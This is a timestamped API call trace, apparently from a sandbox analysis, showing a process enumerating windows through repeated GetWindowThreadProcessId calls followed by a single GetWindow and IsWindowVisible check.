	[0622.789] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x153c
	[0622.794] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1808
	[0622.797] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12a4
	[0622.800] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1740
	[0622.803] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16c4
	[0622.805] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1820
	[0623.859] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16ac
	[0624.673] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1858
	[0624.683] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1664
	[0624.686] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10b4
	[0624.689] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10ac
	[0625.636] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10ec
	[0625.642] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1068
	[0626.928] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x17e0
	[0626.933] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x102c
	[0626.938] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x17a4
	[0626.943] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1050
	[0626.946] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1694
	[0627.862] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1770
	[0629.495] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1720
	[0629.713] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x165c
	[0629.720] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1578
	[0629.724] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16c0
	[0629.726] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x161c
	[0629.732] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1638
	[0629.734] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15c8
	[0631.498] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1554
	[0631.498] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1674
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1520
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14bc
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf8c
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe9c
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1434
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14ec
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfcc
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12ac
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1484
	[0631.499] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x934
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc0c
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb08
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x948
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1178
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13e0
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcd0
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13fc
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdc8
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc18
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc2c
	[0631.500] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa1c
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1244
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdb0
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1398
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1358
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1370
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1340
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x130c
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12c0
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12e4
	[0631.501] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1270
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1298
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x120c
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x122c
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11c4
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11b0
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1188
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1148
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1160
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10fc
	[0631.502] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe34
	[0631.503] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xea4
	[0631.503] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x514
	[0631.503] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe48
	[0631.503] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbc8
	[0631.503] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdf8
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x318
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcac
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8bc
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf9c
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf48
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe40
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xecc
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xeb8
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe80
	[0631.504] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe98
	[0631.505] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe60
	[0631.505] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xee4
	[0631.505] GetWindow (hWnd=0x103fc, uCmd=0x4) returned 0x0
	[0631.506] IsWindowVisible (hWnd=0x103fc) returned 0
	[0631.506] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf00
	[0631.507] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdf0
	[0631.507] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe1c
	[0631.507] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdd0
	[0631.507] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd94
	[0631.507] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd74
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd00
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcd8
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc84
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xca4
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc64
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc24
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb84
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbac
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x384
	[0631.508] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xab8
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x33c
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa44
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa64
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8a8
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaf0
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x88c
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb04
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x910
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x230
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xac0
	[0631.509] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xab4
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaac
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x3d0
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x978
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa7c
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x59c
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa88
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa6c
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa68
	[0631.510] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x9f8
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa04
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x924
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8dc
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7dc
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x768
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x764
	[0631.511] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x820
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x810
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x794
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x83c
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7ac
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb44
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb5c
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x838
	[0631.512] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.513] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x818
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5b8
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x494
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1ec
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x440
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7e8
	[0631.514] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x730
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x2c8
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x31c
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x330
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x128
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5c8
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6f8
	[0631.515] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x358
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x73c
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb0
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x250
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x240
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x790
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x61c
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0631.516] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x568
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x568
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x57c
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x554
	[0631.517] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x528
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x79c
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4e0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0631.518] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x44c
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x558
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1bb4
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10bc
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1b50
	[0631.519] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14b4
	[0631.520] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x149c
